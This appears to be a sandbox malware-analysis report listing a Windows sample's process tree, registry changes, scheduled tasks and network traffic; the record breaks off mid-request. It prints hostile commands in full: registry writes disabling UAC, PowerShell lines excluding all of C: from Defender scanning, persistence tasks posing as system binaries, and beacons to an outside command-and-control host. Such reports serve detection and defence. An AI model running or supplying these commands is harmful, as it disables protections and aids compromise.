Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Idle.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Idle.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe
"C:\Users\Admin\AppData\Local\Temp\cc40c7688f4ad5dedb1a3ac1abba9c35bc7c3eadb777ab8f1b8b21b29ddee20a.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:532
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:892
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1592
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2420
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\xdaIBrRjuO.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Windows\system32\w32tm.exe
    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
    3⤵
    PID:2764
- - C:\Windows\de-DE\Idle.exe
    "C:\Windows\de-DE\Idle.exe"
    3⤵
    - UAC bypass
    - Executes dropped EXE
    - Checks whether UAC is enabled
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2360
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f6653991-70fd-4951-a44f-9743bd711485.vbs"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2212
    - - C:\Windows\de-DE\Idle.exe
        
        C:\Windows\de-DE\Idle.exe
        5⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:2856
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b220287c-44ea-40e9-83cd-8629e994cc9b.vbs"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2796
        
        C:\Windows\de-DE\Idle.exe
        
        C:\Windows\de-DE\Idle.exe
        7⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        System policy modification
        
        PID:1872
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\458e1045-b275-4c4b-bef4-330b3e294e31.vbs"
        8⤵
        
        PID:756
        
        C:\Windows\de-DE\Idle.exe
        
        C:\Windows\de-DE\Idle.exe
        9⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2000
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5d1fc40f-bd7d-414d-9b31-83b00f9d94a9.vbs"
        10⤵
        
        PID:2704
        
        C:\Windows\de-DE\Idle.exe
        
        C:\Windows\de-DE\Idle.exe
        11⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2984
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1d011738-ba60-4bf4-9224-d7541d98cf93.vbs"
        12⤵
        
        PID:580
        
        C:\Windows\de-DE\Idle.exe
        
        C:\Windows\de-DE\Idle.exe
        13⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2504
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\59bba0d8-a6d5-45b9-aad4-ca04187d6149.vbs"
        14⤵
        
        PID:3000
        
        C:\Windows\de-DE\Idle.exe
        
        C:\Windows\de-DE\Idle.exe
        15⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:2744
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fb668643-24b9-4c41-9f14-6b0daf6e4b40.vbs"
        16⤵
        
        PID:556
        
        C:\Windows\de-DE\Idle.exe
        
        C:\Windows\de-DE\Idle.exe
        17⤵
        UAC bypass
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:1776
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\51f98849-989f-4d2e-9284-7428b84ab4a9.vbs"
        18⤵
        
        PID:1672
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a013cb02-ad15-4282-a933-907ebccbc19a.vbs"
        18⤵
        
        PID:2520
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30b15e5f-6797-4988-ab36-b208ad42acc2.vbs"
        16⤵
        
        PID:2964
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9596bce7-a4e5-4808-b828-7a543388fd9b.vbs"
        14⤵
        
        PID:2056
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\0f2cf5e1-4078-40b4-9ec7-fe6699f21b92.vbs"
        12⤵
        
        PID:1284
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a227af85-66a0-4c6f-a616-bf53e121f314.vbs"
        10⤵
        
        PID:2992
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7f84179d-60d9-4ee2-8ae4-871537e11c71.vbs"
        8⤵
        
        PID:1440
      - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ea3170e6-7e77-4a70-a572-3bd25223b751.vbs"
        6⤵
        
        PID:1832
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fc9188fd-cae8-4b56-9564-865780c41bec.vbs"
      4⤵
      PID:944

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Uninstall Information\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Uninstall Information\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Uninstall Information\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files\Internet Explorer\de-DE\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\de-DE\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2752

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\de-DE\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 8 /tr "'C:\Windows\es-ES\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2520

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\es-ES\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Windows\es-ES\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Windows\Logs\DPX\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2648

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Windows\Logs\DPX\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 13 /tr "'C:\Windows\Logs\DPX\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 13 /tr "'C:\Windows\de-DE\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Windows\de-DE\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Windows\de-DE\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1976

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2348

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1260

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2256

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Favorites\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2768

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Public\Favorites\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 10 /tr "'C:\Users\Public\Favorites\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1912

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Application Data\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Users\Admin\Application Data\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2776

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\Application Data\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2820

Network

DNS

81888.cllt.nyashteam.ru

Idle.exe

Remote address:

8.8.8.8:53

Request

81888.cllt.nyashteam.ru

IN A

Response

81888.cllt.nyashteam.ru

IN A

104.21.2.8

81888.cllt.nyashteam.ru

IN A

172.67.186.200
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94 HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:01:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D9s9lTA0DEn3I7zu6V2Z9mZFnXdgjVcse8RoQNNWkPPOFdk%2B7sZfptiuYpGsJnm6GjvWpx58MilKCXvRx9tZgpmz2IMTR9DHzqt7TUAs4gHdy%2BpJLW%2B7Dq%2FooTzCo2LPIXItMnftJThLHQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e5396e8bcd25-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47122&min_rtt=47122&rtt_var=23561&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=591&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&gjxtif6QCv6iCN25kcX6uD7bDX9HDHl=FQz1e0k8&POdY3YFqg5QffOdlVpLfyN4Ks=vXBbt1ZLeydDK94 HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:01:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HTf5IaWMhKhZJ1S874933gv5Oo1K0xidOeZA1EIqfvxqkBOpvJfrsGKPnfw%2FErkgslFqHInlVh04RqrE0aEkoXtgcW5ufybhToORonEK9aAVfmN%2FdcvPCbXLLMKq7z2u2SKZohm7X%2BrixQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e53aaff0cd25-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=48217&min_rtt=47122&rtt_var=15414&sent=5&recv=5&lost=0&retrans=0&sent_bytes=1032&recv_bytes=1158&delivery_rate=73226&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 81888.cllt.nyashteam.ru
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:01:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PF%2Bx25XZ3ILznBLtjOfC%2Fmy1tM2bqIuahguUskZdF42jmklEapal%2FSbGeZ6hZTBYkU3KSDi8IPIK9wH64slz3QmJmdFULW%2BHnj9Q%2Byy2Pyy7B9Fn1LdT2djf%2BHAJgN2ytnNR%2FRYy6Q6I%2FA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e583eb456515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47473&min_rtt=47473&rtt_var=23736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=541&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&eDxGkArHWPCJzs6LNTJ9RwtTgXhljIV=GREeNmBPFA44myhYvTVk7KrrTekMdG HTTP/1.1
Accept: */*
Content-Type: text/javascript
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 81888.cllt.nyashteam.ru

Response

HTTP/1.1 404 Not Found

Date: Thu, 19 Dec 2024 11:01:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOib55WAskEMUW3Or6z%2B7CoamJxy3a78qjixXCUCcMjWlph3kN0r1vnu5THU0wZrNfU1fzpNPmrmKBc%2F4cLmXF6Ts845Qcz4F5mJ%2FdHugnqSpISXbGD%2BKWDcxw8UX7mT4zYU7aIEd9H6Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f46e584fc706515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=47493&min_rtt=47473&rtt_var=17844&sent=4&recv=5&lost=0&retrans=0&sent_bytes=1040&recv_bytes=1058&delivery_rate=56968&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://81888.cllt.nyashteam.ru/nyashsupport.php?XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk

Idle.exe

Remote address:

104.21.2.8:80

Request

GET /nyashsupport.php?XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk&82b50e11519780bcdea0f5eed0dbe996=46e693da2d8d1edd9f5b38183b4a5dcf&42990d46ddcb120b0f79c9b1ff7b2bec=QM1YzM4gTZkNTY3cjM1Y2NzgTMkdjZlRGNiJmZ0YDNidzY3YjMwgjN&XetlraSVrJx=8hyd7fKhQ9O68UKq2Ncsk HTTP/1.1
Accept: */*
